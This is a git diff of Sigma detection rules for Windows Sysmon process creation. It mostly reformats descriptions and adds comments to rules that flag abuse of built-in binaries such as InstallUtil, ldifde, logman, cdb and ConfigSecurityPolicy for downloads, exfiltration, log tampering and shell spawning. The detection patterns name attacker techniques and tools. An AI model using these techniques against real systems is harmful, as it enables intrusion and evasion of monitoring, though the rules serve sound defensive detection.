@@ -22,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: \aspnet_regiis.exe - - OriginalFileName: aspnet_regiis.exe + - Image|endswith: \aspnet_regiis.exe + - OriginalFileName: aspnet_regiis.exe selection_args: - CommandLine|contains|all: + CommandLine|contains|all: - connectionStrings - ' -pdf' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml b/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml index 26618afd1..fc570742f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml @@ -1,8 +1,7 @@ title: Suspicious IIS Module Registration id: 043c4b8b-3a54-4780-9682-081cb6b8185c status: test -description: Detects a suspicious IIS module registration as described in Microsoft - threat report on IIS backdoors +description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors references: - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/ author: Florian Roth (Nextron Systems), Microsoft (idea) @@ -22,12 +21,12 @@ detection: selection_parent: ParentImage|endswith: \w3wp.exe selection_cli_1: - CommandLine|contains: appcmd.exe add module + CommandLine|contains: appcmd.exe add module selection_cli_2: - CommandLine|contains: ' system.enterpriseservices.internal.publish' + CommandLine|contains: ' system.enterpriseservices.internal.publish' Image|endswith: \powershell.exe selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - gacutil - ' /I' condition: process_creation and (selection_parent and 1 of selection_cli_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml b/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml index dd3d51d2c..c7b96f2fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml @@ -1,8 +1,7 @@ title: ImagingDevices Unusual Parent/Child Processes id: f11f2808-adb4-46c0-802a-8660db50fa99 status: test -description: Detects unusual parent or children of the ImagingDevices.exe (Windows - Contacts) process as seen being used with Bumblebee activity +description: Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -21,11 +20,13 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_parent: ParentImage|endswith: + # Add more if known - \WmiPrvSE.exe - \svchost.exe - \dllhost.exe Image|endswith: \ImagingDevices.exe selection_child: + # You can add specific suspicious child processes (such as cmd, powershell...) to increase the accuracy ParentImage|endswith: \ImagingDevices.exe condition: process_creation and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml b/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml index d0a68a548..5ebf7ebc1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_imewbdld_download.yml 
@@ -1,8 +1,8 @@ title: Arbitrary File Download Via IMEWDBLD.EXE id: 863218bd-c7d0-4c52-80cd-0a96c09f54af related: - - id: 8d7e392e-9b28-49e1-831d-5949c6281228 - type: derived + - id: 8d7e392e-9b28-49e1-831d-5949c6281228 + type: derived status: experimental description: Detects usage of "IMEWDBLD.exe" to download arbitrary files references: @@ -23,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \IMEWDBLD.exe - - OriginalFileName: imewdbld.exe + - Image|endswith: \IMEWDBLD.exe + - OriginalFileName: imewdbld.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) falsepositives: - Unknown +# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml b/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml index b873ff053..a047fbc85 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml @@ -1,8 +1,7 @@ title: InfDefaultInstall.exe .inf Execution id: ce7cf472-6fcc-490a-9481-3786840b5d9b status: test -description: Executes SCT script using scrobj.dll from a command in entered into a - specially prepared INF file. +description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution - https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/ 
@@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'InfDefaultInstall.exe ' - '.inf' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml b/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml index 479507381..80ad079d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_installutil_download.yml @@ -1,10 +1,8 @@ title: File Download Via InstallUtil.EXE id: 75edd216-1939-4c73-8d61-7f3a0d85b5cc status: test -description: 'Detects use of .NET InstallUtil.exe in order to download arbitrary files. - The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" - - ' +description: | + Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\" references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239 author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \InstallUtil.exe - - OriginalFileName: InstallUtil.exe + - Image|endswith: \InstallUtil.exe + - OriginalFileName: InstallUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml index 0abc749e3..0d132e851 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml 
@@ -1,8 +1,7 @@ title: Suspicious Execution of InstallUtil Without Log id: d042284c-a296-4988-9be5-f424fadcc28c status: test -description: Uses the .NET InstallUtil.exe application in order to execute image without - log +description: Uses the .NET InstallUtil.exe application in order to execute image without log references: - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/ - https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \InstallUtil.exe Image|contains: Microsoft.NET\Framework - CommandLine|contains|all: + CommandLine|contains|all: - '/logfile= ' - /LogToConsole=false condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml index 464390f71..0e3cb16cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Shells Spawn by Java Utility Keytool id: 90fb5e62-ca1f-4e22-b42e-cc521874c938 status: test -description: Detects suspicious shell spawn from Java utility keytool process (e.g. - adselfservice plus exploitation) +description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation) references: - https://redcanary.com/blog/intelligence-insights-december-2021 - https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml index 0fe3a3bbf..708972f91 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious Child Process Of Manage Engine ServiceDesk id: cea2b7ea-792b-405f-95a1-b903ea06458f status: experimental -description: Detects suspicious child processes of the "Manage Engine ServiceDesk - Plus" Java web service +description: Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service references: - https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/ - https://github.com/horizon3ai/CVE-2022-47966/blob/3a51c6b72ebbd87392babd955a8fbeaee2090b35/CVE-2022-47966.py @@ -38,7 +37,7 @@ detection: - \mshta.exe - \net.exe - \net1.exe - - \notepad.exe + - \notepad.exe # Often used in POCs - \powershell.exe - \pwsh.exe - \query.exe @@ -47,14 +46,18 @@ detection: - \scrcons.exe - \sh.exe - \systeminfo.exe - - \whoami.exe + - \whoami.exe # Often used in POCs - \wmic.exe - \wscript.exe + # - '\hh.exe' + # - '\regsvr32.exe' + # - '\rundll32.exe' + # - '\scriptrunner.exe' filter_main_net: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: ' stop' + CommandLine|contains: ' stop' condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate sub processes started by Manage Engine ServiceDesk Pro diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml b/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml index 55e7ef65a..76b1987b2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml 
@@ -1,8 +1,7 @@ title: Java Running with Remote Debugging id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 status: test -description: Detects a JAVA process running with remote debugging allowing more than - just localhost to connect +description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect references: - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp author: Florian Roth (Nextron Systems) @@ -20,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_jdwp_transport: - CommandLine|contains: transport=dt_socket,address= + CommandLine|contains: transport=dt_socket,address= selection_old_jvm_version: - CommandLine|contains: + CommandLine|contains: - jre1. - jdk1. exclusion: - CommandLine|contains: + CommandLine|contains: - address=127.0.0.1 - address=localhost condition: process_creation and (all of selection_* and not exclusion) diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml index 6d7c1b01a..c4a1f4361 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml @@ -1,11 +1,10 @@ title: Suspicious Processes Spawned by Java.EXE id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d related: - - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 - type: similar + - id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 + type: similar status: experimental -description: Detects suspicious processes spawned from a Java host process which could - indicate a sign of exploitation (e.g. log4j) +description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j) author: Andreas Hunkeler (@Karneades), Florian Roth date: 2021/12/17 modified: 2023/11/09 
@@ -46,7 +45,7 @@ detection: - \sh.exe - \systeminfo.exe - \whoami.exe - - \wmic.exe + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe condition: process_creation and selection falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml index 83c823446..cf5832916 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml @@ -1,11 +1,10 @@ title: Shell Process Spawned by Java.EXE id: dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 related: - - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d - type: similar + - id: 0d34ed8b-1c12-4ff2-828c-16fc860b766d + type: similar status: test -description: Detects shell spawned from Java host process, which could be a sign of - exploitation (e.g. log4j exploitation) +description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation) author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali date: 2021/12/17 modified: 2023/11/09 @@ -28,8 +27,8 @@ detection: - \powershell.exe - \pwsh.exe filter_main_build: - ParentImage|contains: build - CommandLine|contains: build + ParentImage|contains: build # excluding CI build agents + CommandLine|contains: build # excluding CI build agents condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate calls to system binaries diff --git a/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml index 41efd9d7d..b89fd59c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml @@ -1,8 +1,7 @@ title: Suspicious SysAidServer Child id: 60bfeac3-0d35-4302-8efb-1dd16f715bc6 status: test -description: Detects suspicious child processes of SysAidServer (as seen in MERCURY - threat actor intrusions) +description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions) references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ author: Florian Roth (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml index c4a73aab3..a92a9c9f9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_kd_execution.yml @@ -18,11 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \kd.exe - - OriginalFileName: kd.exe + - Image|endswith: \kd.exe + - OriginalFileName: kd.exe condition: process_creation and selection falsepositives: - - Rare occasions of legitimate cases where kernel debugging is necessary in production. - Investigation is required + - Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml index 3f9550424..67e7412ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml 
@@ -1,8 +1,7 @@ title: Computer Password Change Via Ksetup.EXE id: de16d92c-c446-4d53-8938-10aeef41c8b6 status: experimental -description: Detects password change for the computer's domain account or host principal - via "ksetup.exe" +description: Detects password change for the computer's domain account or host principal via "ksetup.exe" references: - https://twitter.com/Oddvarmoe/status/1641712700605513729 - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - Image|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /setcomputerpassword ' + CommandLine|contains: ' /setcomputerpassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml index adb32fd0e..95e142949 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml @@ -17,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ksetup.exe - - OriginalFileName: ksetup.exe + - Image|endswith: \ksetup.exe + - OriginalFileName: ksetup.exe selection_cli: - CommandLine|contains: ' /ChangePassword ' + CommandLine|contains: ' /ChangePassword ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml b/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml index 60e4a41e9..00806869f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_ldifde_export.yml @@ -1,8 +1,7 @@ title: Active Directory Structure Export Via Ldifde.EXE id: 4f7a6757-ff79-46db-9687-66501a02d9ec status: experimental -description: Detects the execution of "ldifde.exe" in order to export organizational - Active Directory structure. +description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure. references: - https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_ldif: - - Image|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - Image|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cmd: - CommandLine|contains: -f + CommandLine|contains: -f filter_import: - CommandLine|contains: ' -i' + CommandLine|contains: ' -i' condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml b/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml index da8328381..60402cf08 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml 
@@ -1,11 +1,8 @@ title: Import LDAP Data Interchange Format File Via Ldifde.EXE id: 6f535e01-ca1f-40be-ab8d-45b19c0c8b7f status: experimental -description: 'Detects the execution of "Ldifde.exe" with the import flag "-i". The - can be abused to include HTTP-based arguments which will allow the arbitrary download - of files from a remote server. - - ' +description: | + Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. references: - https://twitter.com/0gtweet/status/1564968845726580736 - https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html @@ -27,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ldifde.exe - - OriginalFileName: ldifde.exe + - Image|endswith: \ldifde.exe + - OriginalFileName: ldifde.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -i - -f condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml b/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml index cab9d0ce2..19a91819e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml 
@@ -1,10 +1,7 @@ title: Rebuild Performance Counter Values Via Lodctr.EXE id: cc9d3712-6310-4320-b2df-7cb408274d53 status: experimental -description: Detects the execution of "lodctr.exe" to rebuild the performance counter - registry values. This can be abused by attackers by providing a malicious config - file to overwrite performance counter configuration to confuse and evade monitoring - and security solutions. +description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions. references: - https://learn.microsoft.com/en-us/windows/security/identity-protection/virtual-smart-cards/virtual-smart-card-tpmvscmgr author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +20,7 @@ detection: Image|endswith: \lodctr.exe OriginalFileName: LODCTR.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /r' - ' -r' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml b/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml index 0bc3cd3c1..7d72a478c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml @@ -1,8 +1,7 @@ title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE id: cd1f961e-0b96-436b-b7c6-38da4583ec00 status: test -description: Detects the execution of "logman" utility in order to disable or delete - Windows trace sessions +description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions references: - https://twitter.com/0gtweet/status/1359039665232306183?s=21 - https://ss64.com/nt/logman.html 
@@ -22,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \logman.exe - - OriginalFileName: Logman.exe + - Image|endswith: \logman.exe + - OriginalFileName: Logman.exe selection_action: - CommandLine|contains: + CommandLine|contains: - 'stop ' - 'delete ' selection_service: - CommandLine|contains: + CommandLine|contains: - Circular Kernel Context Logger - - EventLog- + - EventLog- # Cover multiple traces starting with EventLog-* - SYSMON TRACE - SysmonDnsEtwSession condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml index 259473d83..fcfabc8fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml @@ -1,8 +1,7 @@ title: WinDbg/CDB LOLBIN Usage id: b5c7395f-e501-4a08-94d4-57fe7a9da9d2 status: test -description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes - or commands from a debugger script file +description: Detects usage of "cdb.exe" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/ - https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cdb.exe - - OriginalFileName: CDB.Exe + - Image|endswith: \cdb.exe + - OriginalFileName: CDB.Exe selection_cli: - CommandLine|contains: - - ' -c ' + CommandLine|contains: + - ' -c ' # Using a debugger script - ' -cf ' condition: process_creation and (all of selection*) falsepositives: 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml index ee3e67dfb..cc31d924b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml @@ -1,11 +1,10 @@ title: Custom Class Execution via Xwizard id: 53d4bb30-3f36-4e8a-b078-69d36c4a79ff status: test -description: Detects the execution of Xwizard tool with specific arguments which utilized - to run custom class properties. +description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/07 modified: 2021/11/27 tags: @@ -21,7 +20,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \xwizard.exe - CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} + CommandLine|re: \{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\} condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml index 26bafce30..52c89d1d9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml 
@@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmdl32.exe - - OriginalFileName: CMDL32.EXE + - Image|endswith: \cmdl32.exe + - OriginalFileName: CMDL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/vpn ' - '/lan ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml index 27cefb6da..6b29db763 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml @@ -1,8 +1,7 @@ title: Suspicious ConfigSecurityPolicy Execution id: 1f0f6176-6482-4027-b151-00071af39d7e status: test -description: Upload file, credentials or data exfiltration with Binary part of Windows - Defender +description: Upload file, credentials or data exfiltration with Binary part of Windows Defender references: - https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/ author: frack113 @@ -20,11 +19,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational lolbas: - - CommandLine|contains: ConfigSecurityPolicy.exe - - Image|endswith: \ConfigSecurityPolicy.exe - - OriginalFileName: ConfigSecurityPolicy.exe + - CommandLine|contains: ConfigSecurityPolicy.exe + - Image|endswith: \ConfigSecurityPolicy.exe + - OriginalFileName: ConfigSecurityPolicy.exe remote: - CommandLine|contains: + CommandLine|contains: - https:// - http:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml index 379ee5482..e4d9e4fdb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml @@ -1,8 +1,7 @@ title: Suspicious CustomShellHost Execution id: 84b14121-9d14-416e-800b-f3b829c5a14d status: test -description: Detects the execution of CustomShellHost binary where the child isn't - located in 'C:\Windows\explorer.exe' +description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe' references: - https://github.com/LOLBAS-Project/LOLBAS/pull/180 - https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml index 07745fc76..d4fee6070 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml @@ -23,13 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli: - CommandLine|contains: + CommandLine|contains: - '/in:' - '/out:' - '/uri:' selection_img: - - Image|endswith: \DataSvcUtil.exe - - OriginalFileName: DataSvcUtil.exe + - Image|endswith: \DataSvcUtil.exe + - OriginalFileName: DataSvcUtil.exe condition: process_creation and (all of selection*) fields: - ComputerName 
@@ -38,10 +38,7 @@ fields: - ParentCommandLine falsepositives: - DataSvcUtil.exe being used may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making - changes in your environment. - - DataSvcUtil.exe being executed from unfamiliar users should be investigated. - If known behavior is causing false positives, it can be exempted from the - rule. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml index 18e485aec..2a9e85079 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml @@ -23,7 +23,7 @@ detection: selection: Image|endswith: \dctask64.exe filter: - CommandLine|contains: DesktopCentral_Agent\agent + CommandLine|contains: DesktopCentral_Agent\agent condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml index be22e75bd..2bc03dd2c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml 
